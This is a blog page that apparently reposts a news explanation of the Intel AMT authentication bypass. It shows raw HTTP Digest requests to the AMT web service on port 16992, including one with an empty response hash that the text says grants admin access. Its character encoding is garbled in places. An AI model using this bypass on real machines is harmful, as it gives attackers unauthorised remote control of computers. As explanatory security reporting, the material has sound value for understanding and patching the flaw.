![]() And yet Intel's bouncer lets you in, even though you flashed the doorman no password – no valid ID – at all: HTTP/1.1 200 OK Date: Thu, 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 00:00:00 GMT ![]() Well, screw that – using a proxy between you and the device, or a similar traffic-editing tool, just strip out the response hash to send instead: GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11 Linux x86_64 rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml q=0.9,*/* q=0.8 Accept-Language: en-US,en q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username=»admin», realm=✽igest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n», uri=»/index.htm», response=»», qop=auth, nc=00000001, cnonce=✶0513ab58858482c» ![]() Essentially, behind the scenes, your browser would normally send something like this to the AMT service, which includes the hashed response string containing the username, password and server nonce: GET /index.htm HTTP/1.1 Host: 192.168.1.2:16992 User-Agent: Mozilla/5.0 (X11 Linux x86_64 rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml q=0.9,*/* q=0.8 Accept-Language: en-US,en q=0.5 Accept-Encoding: gzip, deflate Referer: Connection: keep-alive Authorization: Digest username=»admin», realm=✽igest:048A0000000000000000000000000000», nonce=»Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J», uri=»/index.htm», response=»d3d4914a43454b159a3fa6f5a91d801d», qop=auth, nc=00000001, cnonce=✹c5beca4011eea5c»
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |